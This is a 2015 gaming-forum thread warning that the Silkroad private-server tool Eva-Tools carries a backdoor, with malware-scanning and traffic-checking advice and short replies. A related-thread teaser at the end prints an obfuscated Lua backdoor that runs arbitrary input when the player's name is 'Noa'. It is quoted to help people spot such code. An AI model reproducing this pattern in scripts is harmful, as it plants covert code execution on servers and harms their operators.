Register for your free account! | Forgot your password?

You last visited: Today at 18:24

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement


Advertise with us!

[Release] Evatools (Backdoor)

Discussion on [Release] Evatools (Backdoor) within the SRO PServer Guides & Releases forum part of the SRO Private Server category.

Reply
 
Old   #1
 
elite*gold: 0
The Black Market: 6/0/0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
[Release] Evatools (Backdoor)

Hello again!

Here with a new back-door found by Chernobyl. The famous "Eva-Tools" is infected and all releases of it should be removed instantly.



If you want to clean ur PC, use Malwarebytes this block this threat and you can safely use this program.

Remember:
When downloading such programs, use Wireshark and check if any outgoing traffic is sent to a specific server, or check it with Net Reflector Yourself.

For people who love it(Clean version):


Decrypted source:


Detected at 2015-07-03.
​Goofie​ is offline  
Thanks
10 Users
Old 07/03/2015, 10:31   #2
dotCom
 
Devsome's Avatar
 
elite*gold: 9842
The Black Market: 107/0/0
Join Date: Mar 2009
Posts: 16,867
Received Thanks: 4,685
ty but that is not new.



//edit: Not Found
Devsome is offline  
Old 07/03/2015, 10:40   #3
 
elite*gold: 0
The Black Market: 6/0/0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
Quote:
Originally Posted by Devsome View Post
ty but that is not new.



//edit: Not Found
Just wanted to release it, also there is clean .exe and source.
​Goofie​ is offline  
Old 07/03/2015, 11:10   #4
 
elite*gold: 0
The Black Market: 0/0/0
Join Date: Aug 2010
Posts: 41
Received Thanks: 3
@Gray Face
i need to talk with u about something please
please send me msg with ur skype
medolife20 is offline  
Old 07/03/2015, 11:25   #5
 
elite*gold: 0
The Black Market: 6/0/0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
Quote:
Originally Posted by medolife20 View Post
@Gray Face
i need to talk with u about something please
please send me msg with ur skype
I don't use skype.
​Goofie​ is offline  
Old 07/03/2015, 11:41   #6
 
elite*gold: 0
The Black Market: 0/0/0
Join Date: Aug 2010
Posts: 41
Received Thanks: 3
K tell me how to talk with u ?
cause i tried to send u msg here but it say u closed it
medolife20 is offline  
Old 07/03/2015, 12:17   #7
 
elite*gold: 0
The Black Market: 6/0/0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
Quote:
Originally Posted by medolife20 View Post
K tell me how to talk with u ?
cause i tried to send u msg here but it say u closed it
Try to send now!
​Goofie​ is offline  
Old 07/03/2015, 13:19   #8
 
WickedNite.'s Avatar
 
elite*gold: 15
The Black Market: 1/0/0
Join Date: Jul 2014
Posts: 1,616
Received Thanks: 1,377
Nothing new, anyone with a bit of brain scans his network and applications before using them.

Besides, chernobyl is already known for his dirty stuff.
WickedNite. is offline  
Thanks
1 User
Old 07/03/2015, 13:58   #9
 
elite*gold: 0
The Black Market: 6/0/0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
Quote:
Originally Posted by TheWickedNite View Post
Nothing new, anyone with a bit of brain scans his network and applications before using them.

Besides, chernobyl is already known for his dirty stuff.
Well said, well said.
​Goofie​ is offline  
Old 07/03/2015, 14:46   #10
 
elite*gold: 0
The Black Market: 2/0/0
Join Date: Mar 2015
Posts: 311
Received Thanks: 164
Good Job
Gummieֆ' is offline  
Old 07/03/2015, 15:07   #11
 
blapanda's Avatar
 
elite*gold: 0
The Black Market: 0/0/0
Join Date: Jul 2009
Posts: 1,860
Received Thanks: 760
Isn't that new for me either.


"Release files of chern are always clean, it is just a false positive", yea sure. Whoever trusts anyone without any questioning about anything is a brainless jerk.
blapanda is offline  
Old 07/04/2015, 08:21   #12
 
elite*gold: 0
The Black Market: 1/0/0
Join Date: Mar 2010
Posts: 568
Received Thanks: 228
Good JOB

Quote:
Originally Posted by Gray Face View Post
Hello again!

Here with a new back-door found by Chernobyl. The famous "Eva-Tools" is infected and all releases of it should be removed instantly.



If you want to clean ur PC, use Malwarebytes this block this threat and you can safely use this program.

Remember:
When downloading such programs, use Wireshark and check if any outgoing traffic is sent to a specific server, or check it with Net Reflector Yourself.

For people who love it(Clean version):


Decrypted source:


Detected at 2015-07-03.
Laag#82 is offline  
Thanks
1 User
Reply

« request please | mBot Windows 8 LOADER !! No Manual DLL Injector !! (for mBot 1.12b) »

Similar Threads Similar Threads
[RELEASE] LUA Backdoor by Noa (Beispiel)
11/12/2013 - Metin2 PServer Guides & Strategies - 60 Replies
Da Noa solche "Backdoors" in seine Quests packt wollte ich euch mal ein Beispiel zeigen wonach ihr bei seinen releasten Quests suchen solltet. function cCost() local da = string.format('%c%c%c',78,111,97) == string.gsub("$get_name$", "%$(.-)%$",function (a ) return pc() end) and loadstring('return '..loadstring('return '..string.format('%c%c%c%c%c',105,110,112,117,116) ..'()')())() and da or 20000000 return da end



All times are GMT +1. The time now is 18:26.

elitepvpers - play less, get more - Top

Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.